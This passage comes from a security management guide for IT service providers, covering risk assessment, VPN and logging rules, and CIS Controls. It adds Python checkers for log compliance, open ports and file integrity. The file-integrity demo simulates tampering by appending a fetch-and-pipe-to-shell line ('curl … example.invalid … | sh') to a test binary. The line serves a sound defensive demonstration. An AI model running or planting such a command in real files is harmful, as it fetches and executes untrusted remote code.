As described in the Summary, basic IT security management practices lie in the following six domains:
- IT Service Provider Information Security Management
- Information Security Subject Matter Expertise
- Security Management of the IT Interface
- Security Management of the IT Network: Use of CIS Critical Security Controls
- 3rd-Party Security Assurance
- Information Security Review with Clients
These are described below.
IT Service Provider Information Security Management
The IT Service Provider manages its own information security by means of a formal documented Information Security Management Program [1] designed to protect the confidentiality, integrity and availability of its information and the information of its clients in accordance with commercially reasonable information security management standards appropriate for a company with its security-risk profile and the security-risk profiles of its clients.
The IT Service Provider’s Information Security Management Program is based on an Information Risk Assessment.
- The IT Service Provider conducts a periodic risk assessment, at least annually, of its information systems sufficient to inform the design of its information security management program.
- The IT Service Provider updates its risk assessment as reasonably necessary to address changes to its information systems, nonpublic information of clients and others, or business operations.
- The IT Service Provider’s risk assessment considers the particular risks of its business operations related to cybersecurity, nonpublic information of clients and others, information systems utilized, and the availability and effectiveness of controls to protect client and other nonpublic information and information systems.
- The IT Service Provider carries out its risk assessment in accordance with written policies and procedures, including:
  - Documented criteria for evaluating and categorizing identified cybersecurity risks or threats facing the IT organization and its clients;
  - Documented criteria for assessing assurance of confidentiality, integrity, and availability of information systems and nonpublic information;
  - Documentation describing how identified risks are mitigated, accepted, or otherwise addressed based on the risk assessment.
- The organization documents its risk assessment.
The IT Service Provider’s Information Security Management Program is designed to perform the following core cybersecurity functions: [2]
- Identify and assess internal and external cybersecurity risks that may threaten the security of client information or nonpublic information stored on its information systems.
- Protect client information and nonpublic information stored on those information systems from unauthorized access, use or other malicious acts through physical, administrative and technical controls, including the implementation of policies and procedures.
- Detect cybersecurity events and alert appropriate personnel.
- Respond to identified or detected cybersecurity events to mitigate any negative effects and restore operations.
- Recover from cybersecurity events and restore normal operations and services.
The IT Service Provider’s information security management program is managed by an Information Security Manager, appointed by Executive management, and responsible and accountable for managing the organization’s information security management program.
The Information Security Manager is supported by a cross-functional steering committee and subject matter expertise. Executive management provides the Information Security Manager with appropriate resources and regularly reviews the information security program.
The IT Service Provider has a program for identifying, documenting and controlling sensitive information with access to information based upon the twin concepts of least privilege and need-to-know.
The IT Service Provider has an information security awareness and education program so that all staff receive information security awareness training at least annually and are periodically trained in phishing defense.
The IT Service Provider has formal documented standards for ensuring that 3rd-parties with which it shares information secure it in accordance with documented standards that are at least as strong as the standards described in this document.
The IT Service Provider has formal documented standards, processes and procedures for managing the security of its own IT infrastructure in accordance with the Center for Internet Security (CIS) Critical Security Controls (See below). These standards document, for each control, how – and to what extent – the organization meets that control. As the organization may have different clients with different security needs, the IT Service Provider’s security standards are to meet the highest standard of any of its customers. [3]
The IT Service Provider has documented incident response and business continuity plans that are tested at least annually. The organization’s Incident Response plan calls for client notification as soon as possible in the event of a suspected breach or other security incident.
The IT Service Provider measures its information security performance through metrics that are published at least quarterly to its clients.
IT Service Provider Information Security Subject Matter Expertise
The IT Service Provider has appropriate information security subject matter expertise or access to that expertise.
The IT Service Provider has either a Certified Information Systems Security Professional (CISSP) on staff or utilizes one through an ongoing consulting relationship. [4]
All technical staff receive a minimum of 16 hours per year of information security continuing education.
Information security continuing education includes educational activities in areas such as the following:
- Security and Risk Management
- Asset Security
- Access Controls
- Security Engineering
- Communication and Network Security
- Identity and Access Management
- Security Assessment and Testing
- Security Operations
- Software Development Security
- Penetration Testing
- Risk Identification, Monitoring, and Analysis
- Incident Response, Recovery and Resilience
- Information Security Management Frameworks
- Information Continuity
- Other Advanced Technology Management Programs
Qualifying CPE activities include activities such as:
- Attending educational courses or seminars, such as those offered
- Attending security conferences
- Being an active member of an information security association chapter
- Completing university/college courses
- Providing security training
- Publishing security articles or books
- Serving on industry boards
- Self-study, if properly rigorous and documented
- Volunteer work on behalf of information security professional associations such as (ISC)², ISSA, ISACA, and the Cloud Security Alliance
There are numerous organizations offering continuing education. These include:
- Colleges and Universities
- The SANS Institute
- (ISC)²
- ISSA
- ISACA
- CompTIA
As a general rule, the training courses offered by solution providers on configuring their solutions do not qualify as continuing education.
IT Service Provider Management of the Client IT Interface
All access by the IT Service Provider to a client’s network is protected in accordance with appropriate documented procedures, access is identifiable to a specific person, and audit logs (records) are recorded and securely maintained.
All of the IT Service Provider’s technical personnel having access to a client’s IT network connect via individual user-accounts. The organization does not use shared accounts for access to its clients’ IT networks.
All remote access by the IT Service Provider to a client’s IT network is through a Virtual Private Network (VPN) with two-factor authentication. VPNs are configured with no split tunneling. There is no direct remote access to internal servers from the Internet.
User passwords providing access to a client’s IT network are a minimum of 15 characters in length, composed of all 4 character sets: upper case, lower case, number, and special character.
All access and behavior by the IT Service Provider’s staff on a client’s IT network is logged. All logs are traceable to a specific individual. IT Service Provider logs include at least the following: user identification, type of event, event time, success or failure indication, origination of event, and identity or name of affected data, system component, or resource.
Logs are stored in a secure manner using, for example, a syslog server. Logs are protected from unauthorized modification. [5] Logs are stored for a minimum of 365 days.
The IT Service Provider reviews all administrative accounts with access to its clients’ IT networks at least every 90 days to ensure that staff permissions remain correct.
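The client-interface requirements above (individual accounts, 15-character four-set passwords, the six mandatory log elements, 365-day retention and the 90-day account review) can be expressed as policy-as-code checks that an IT Service Provider runs against its own records. The following is an added example, not part of the SecureTheVillage guide or of any vendor product. It assumes, as constructed conventions for this example, that access logs are JSON lines with the six field names shown, that shared accounts are recognised by a short name list, and that the caller supplies review and retention dates.

```python
"""Policy-as-code checks for the client-interface requirements.

Added example (not the guide's own tooling). Log field names, the shared
account list and all sample records are constructed for this example.
"""
import json
import re
from datetime import date

# The six log elements the guide requires in every record (constructed field names)
REQUIRED_FIELDS = ("user", "event_type", "time", "outcome", "origin", "target")

# Constructed names treated as shared, non-attributable accounts
SHARED_ACCOUNTS = {"admin", "administrator", "root", "helpdesk", "svc_rmm"}

MIN_PASSWORD_LENGTH = 15
ACCOUNT_REVIEW_MAX_DAYS = 90
LOG_RETENTION_MIN_DAYS = 365


def password_meets_policy(password: str) -> bool:
    """15+ characters drawn from all four sets: upper, lower, digit, special."""
    if len(password) < MIN_PASSWORD_LENGTH:
        return False
    classes = (
        re.search(r"[A-Z]", password),
        re.search(r"[a-z]", password),
        re.search(r"[0-9]", password),
        re.search(r"[^A-Za-z0-9]", password),
    )
    return all(classes)


def check_log_record(line: str) -> list:
    """Return findings for one JSON log line; an empty list means compliant."""
    findings = []
    try:
        rec = json.loads(line)
    except json.JSONDecodeError:
        return ["unparseable record"]
    missing = [f for f in REQUIRED_FIELDS if not rec.get(f)]
    if missing:
        findings.append("missing fields: " + ", ".join(missing))
    user = str(rec.get("user", "")).lower()
    if user in SHARED_ACCOUNTS:
        findings.append(f"shared account '{user}' is not traceable to an individual")
    if rec.get("outcome") not in (None, "", "success", "failure"):
        findings.append(f"outcome must be success/failure, got '{rec['outcome']}'")
    return findings


def audit_log_lines(lines) -> dict:
    """Map each non-compliant line number (1-based) to its findings."""
    results = {}
    for number, line in enumerate(lines, 1):
        findings = check_log_record(line)
        if findings:
            results[number] = findings
    return results


def account_review_overdue(last_review: date, today: date) -> bool:
    """True when the 90-day administrative account review has lapsed."""
    return (today - last_review).days > ACCOUNT_REVIEW_MAX_DAYS


def retention_satisfied(oldest_record: date, today: date) -> bool:
    """True when the oldest retained record covers at least 365 days."""
    return (today - oldest_record).days >= LOG_RETENTION_MIN_DAYS


# Constructed sample records, not real log data
SAMPLE_LOG = [
    '{"user":"jsmith","event_type":"rdp_login","time":"2024-03-01T09:12:00Z","outcome":"success","origin":"10.8.0.12","target":"FS01"}',
    '{"user":"admin","event_type":"config_change","time":"2024-03-01T09:20:00Z","outcome":"success","origin":"10.8.0.12","target":"FW01"}',
    '{"user":"akumar","event_type":"file_access","time":"2024-03-01T10:02:00Z","origin":"10.8.0.15"}',
    'not json at all',
]

if __name__ == "__main__":
    for number, findings in audit_log_lines(SAMPLE_LOG).items():
        print(f"line {number}:", "; ".join(findings))
    print("password ok:", password_meets_policy("Correct-Horse-Battery-9"))
    print("review overdue:", account_review_overdue(date(2024, 1, 1), date(2024, 4, 1)))
```

Run against the constructed sample, the second record is flagged because `admin` cannot be traced to a person, the third lacks the outcome and affected-resource elements, and the fourth cannot be parsed at all; only the first is fully compliant. The same checks can be run as a scheduled job over the syslog archive so that gaps are found before a client review, not during an incident.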
IT Service Provider Security Management of the Client’s IT Network: Use of CIS Critical Security Controls
The IT Service Provider manages the security of its clients’ IT networks in accordance with commercially acceptable IT security management standards, at least as strong as those described below.
Use of CIS Critical Security Controls: The IT Service Provider has formal documented standards, processes and procedures for managing the security of its clients’ IT infrastructures in accordance with the Mapping of CIS Controls to STV Basic Guide, based on Center for Internet Security (CIS) Critical Security Controls.
Documentation includes the technical or other standards in-place for implementing the control, the procedures used to configure and implement the control, and the processes used to ensure the control is followed.
There are 20 Critical Security Controls in the CIS Framework, each of which is based upon a set of sub-controls. The SecureTheVillage Guide uses these sub-controls as the basis for managing a client’s network.
As documented in the Mapping of CIS Controls to STV Basic Guide, each Sub-Control is either Required, Addressable, or Mixed.
If a sub-control is listed as required, then compliance with the Guide requires the IT organization to implement the control.
If a sub-control is listed as addressable, then compliance with the Guide requires the organization to either implement the control or, if it doesn’t fully implement the control, that its documented security management standards include:
- A description of why the organization doesn’t implement the control
- The compensating controls the organization has in place to appropriately meet the intent of the sub-control
Some sub-controls contain both a required component and an addressable component. These are indicated in the Mapping of CIS Controls to STV Basic Guide.
Example of a Required Sub-Control: The Guide requires an IT organization to implement the following sub-control without exception.
Critical Security Control #9: Limitation and Control of Network Ports
Sub-Control 9.1: Ensure that only ports, protocols, and services with validated business needs are running on each system.
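Sub-Control 9.1 is only checkable if the "validated business need" for each listener is written down and compared against what is actually running. The script below is an added example (not the guide's own tooling or anything from CIS): it parses captured `ss -Hltnup` output from a Linux host and reports every listening socket that has no entry in an allow-list the IT Service Provider maintains per system role. The allow-list contents and the sample `ss` output are constructed for this example.

```python
"""Report listening services that have no documented business need (Sub-Control 9.1).

Added example. The allow-list and the `ss -Hltnup` sample below are constructed;
a real run would pipe live `ss` output into find_unvalidated().
"""
import re

# Constructed allow-list: (protocol, port) -> documented business need
ALLOWED_LISTENERS = {
    ("tcp", 22): "remote administration over SSH, reachable via VPN only",
    ("tcp", 443): "HTTPS for the client web application",
    ("udp", 123): "NTP time synchronisation",
}

# Pulls the process name out of the `users:(("name",pid=...,fd=...))` column
PROCESS_RE = re.compile(r'users:\(\("([^"]+)"')


def parse_ss_line(line: str):
    """Parse one line of `ss -Hltnup` output into (proto, port, process), or None.

    Column layout with -H: Netid State Recv-Q Send-Q Local:Port Peer:Port [Process]
    """
    fields = line.split()
    if len(fields) < 6:
        return None
    proto, local = fields[0], fields[4]
    try:
        port = int(local.rsplit(":", 1)[1])   # handles 0.0.0.0:22, [::]:22 and *:22
    except (IndexError, ValueError):
        return None
    match = PROCESS_RE.search(line)
    process = match.group(1) if match else "unknown"   # process column needs root
    return proto, port, process


def find_unvalidated(ss_lines, allowed=ALLOWED_LISTENERS) -> list:
    """Return (proto, port, process) for each listener absent from the allow-list."""
    findings = []
    for line in ss_lines:
        parsed = parse_ss_line(line)
        if parsed is None:
            continue
        proto, port, process = parsed
        if (proto, port) not in allowed:
            findings.append((proto, port, process))
    return findings


def report(ss_lines, allowed=ALLOWED_LISTENERS) -> str:
    """Human-readable summary for the documentation required by the Guide."""
    lines = []
    for proto, port, process in find_unvalidated(ss_lines, allowed):
        lines.append(f"{proto}/{port} ({process}): no validated business need on record")
    return "\n".join(lines) if lines else "all listeners have a documented business need"


# Constructed sample of `ss -Hltnup` output from a web server
SAMPLE_SS_OUTPUT = [
    'tcp   LISTEN 0      128          0.0.0.0:22        0.0.0.0:*    users:(("sshd",pid=812,fd=3))',
    'tcp   LISTEN 0      511          0.0.0.0:443       0.0.0.0:*    users:(("nginx",pid=1040,fd=6))',
    'tcp   LISTEN 0      50           0.0.0.0:3389      0.0.0.0:*    users:(("xrdp",pid=1330,fd=11))',
    'udp   UNCONN 0      0            0.0.0.0:123       0.0.0.0:*    users:(("chronyd",pid=602,fd=5))',
    'udp   UNCONN 0      0               [::]:5353         [::]:*    users:(("avahi-daemon",pid=640,fd=12))',
]

if __name__ == "__main__":
    print(report(SAMPLE_SS_OUTPUT))
```

On the constructed sample the RDP listener on tcp/3389 and the mDNS responder on udp/5353 are reported, since neither appears in the allow-list; closing the finding means either removing the service or adding an entry that records who validated the need and why.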
Example of an Addressable Sub-Control:
Critical Security Control #2: Inventory of Authorized and Unauthorized Software
Sub-Control 2.2: Deploy application whitelisting technology that allows systems to run software only if it is included on the whitelist and prevents execution of all other software on the system. The whitelist may be very extensive (as is available from commercial whitelist organizations), so that users are not inconvenienced when using common software. Or, for some special-purpose systems (which require only a small number of programs to achieve their needed business functionality), the whitelist may be quite narrow.
Sub-control 2.2 is addressable rather than required as this control is, in general, not commercially reasonable for mid-market and smaller companies.
Example of a Mixed Required-Addressable Sub-Control:
Critical Security Control #2: Inventory of Authorized and Unauthorized Software
Sub-Control 2.1: Devise a list of authorized software and version that is required in the enterprise for each type of system, including servers, workstations, and laptops of various kinds and uses. This list should be monitored by file integrity checking tools to validate that the authorized software has not been modified.
Required: Devise a list of authorized software and version that is required in the enterprise for each type of system, including servers, workstations, and laptops of various kinds and uses.
Addressable: This list should be monitored by file integrity checking tools to validate that the authorized software has not been modified.
This second clause in #2.1 is addressable rather than required as file integrity checking tools are often not commercially reasonable for smaller companies.
IT Service Provider 3rd-Party Security Assurance
The IT Service Provider follows a formal documented process based upon the Center for Internet Security (CIS) Critical Security Controls to ensure the security of 3rd-parties who will have access to customer information or information systems. This includes:
- Solution organizations
- 3rd-Party applications
- Data centers
- Cloud service providers (SaaS, etc.)
- Cloud infrastructure (Amazon S3, Azure, etc.)
- Backup/recovery systems
- Disaster recovery sites
- Telco and Mobile Service Providers
Information Security Review with Clients
The IT Service Provider meets periodically with each client, at least quarterly, to review the client’s information security profile. The review covers:
- Material cybersecurity events during the time period addressed by the report.
- Changes in the cyber security threat environment, in particular in relation to the client’s risk exposure.
- Cybersecurity risks.
- Overall effectiveness of current security controls, including strengths and weaknesses.
- Recommendations for improving security management, including recommendations that the client implement the organization’s security capabilities.
[1] In the language of the International Information Security Standard, ISO 27001, this is called an Information Security Management System. An Information Security Management System (ISMS) is a systematic and structured approach to managing information security. ISMS implementation includes policies, processes, procedures, organizational structures, education and training programs, relationships with vendors, and the software and hardware functions mediating the flow and control of information. As described in Information Security Standard, ISO 27001, an ISMS implementation should be directly influenced by the organization’s objectives, security requirements, processes employed, size and structure. See https://www.iso.org/isoiec-27001-information-security.html.
[2] These five core functions are described in the Framework for Improving Critical Infrastructure Cybersecurity by the National Institute of Standards and Technology (NIST). See https://www.nist.gov/cyberframework.
[3] From the CIS website: “The CIS Critical Security Controls (CIS Controls) are a concise, prioritized set of cyber practices created to stop today’s most pervasive and dangerous cyber attacks. The CIS Controls are developed, refined, and validated by a community of leading experts from around the world. Organizations that apply just the first five CIS Controls can reduce their risk of cyberattack by around 85 percent. Implementing all 20 CIS Controls increases the risk reduction to around 94 percent…. The CIS Controls embrace the Pareto 80/20 Principle, the idea that taking just a small portion of all the security actions you could possibly take, yields a very large percentage of the benefit of taking all those possible actions.” https://www.cisecurity.org/critical-controls.cfm.
[4] See https://www.isc2.org/cissp/default.aspx.
[5] One strategy for doing this is to set audit files to read-only and audit for whenever permissions change on that file. Another is to use file integrity monitoring/change detection software on logs to ensure that existing log data cannot be changed without generating alerts.
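The addressable clause of Sub-Control 2.1 (monitoring the authorized software list with file integrity checking tools) and the change-detection strategy in footnote [5] rest on the same mechanism: record a cryptographic hash of each file, keep that baseline out of reach of the monitored host, and compare on a schedule. The block below is an added example of that mechanism, not the guide's own tooling or any commercial product; the directory layout and file contents are constructed in a temporary directory. Only archived (rotated) logs should be baselined this way, since a live log legitimately changes with every appended record.

```python
"""File-integrity baseline and comparison (Sub-Control 2.1 clause 2; footnote [5]).

Added example. The files under the temporary directory in demo() are constructed.
"""
import hashlib
import json
import os
import tempfile


def hash_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hash_file(path: str) -> str:
    """SHA-256 of a file, read in chunks so large binaries do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: str) -> dict:
    """Map every regular file under root (path relative to root) to its SHA-256."""
    baseline = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full):
                baseline[os.path.relpath(full, root)] = hash_file(full)
    return baseline


def diff_baselines(old: dict, new: dict) -> dict:
    """Classify changes between two baselines as modified, added or removed."""
    return {
        "modified": sorted(p for p in old if p in new and old[p] != new[p]),
        "added": sorted(p for p in new if p not in old),
        "removed": sorted(p for p in old if p not in new),
    }


def save_baseline(baseline: dict, path: str) -> None:
    """Persist the baseline; in practice this file lives on a separate, write-protected host."""
    with open(path, "w") as fh:
        json.dump(baseline, fh, indent=2, sort_keys=True)


def load_baseline(path: str) -> dict:
    with open(path) as fh:
        return json.load(fh)


def demo() -> dict:
    """Constructed scenario: baseline an authorized binary and an archived log, tamper, compare."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        os.makedirs(os.path.join(root, "bin"))
        os.makedirs(os.path.join(root, "logs"))
        agent = os.path.join(root, "bin", "backup-agent")
        archived_log = os.path.join(root, "logs", "access-2024-02.log")
        with open(agent, "wb") as fh:
            fh.write(b"#!/bin/sh\necho backup\n")
        with open(archived_log, "wb") as fh:
            fh.write(b"2024-02-01T08:00:00Z jsmith rdp_login success 10.8.0.12 FS01\n")

        baseline_file = os.path.join(store, "baseline.json")
        save_baseline(build_baseline(root), baseline_file)

        # Simulated unauthorized changes: binary altered, new file dropped, archived log deleted
        with open(agent, "ab") as fh:
            fh.write(b"curl -s http://example.invalid/x | sh\n")
        with open(os.path.join(root, "bin", "dropper"), "wb") as fh:
            fh.write(b"\x7fELF")
        os.remove(archived_log)

        return diff_baselines(load_baseline(baseline_file), build_baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

The comparison distinguishes the three cases an operator needs to triage differently: a modified entry on the authorized software list (possible tampering with a binary), an added file that was never authorized, and a removed archive (possible log destruction). Each non-empty category should raise an alert, as footnote [5] describes, rather than only being written to a report.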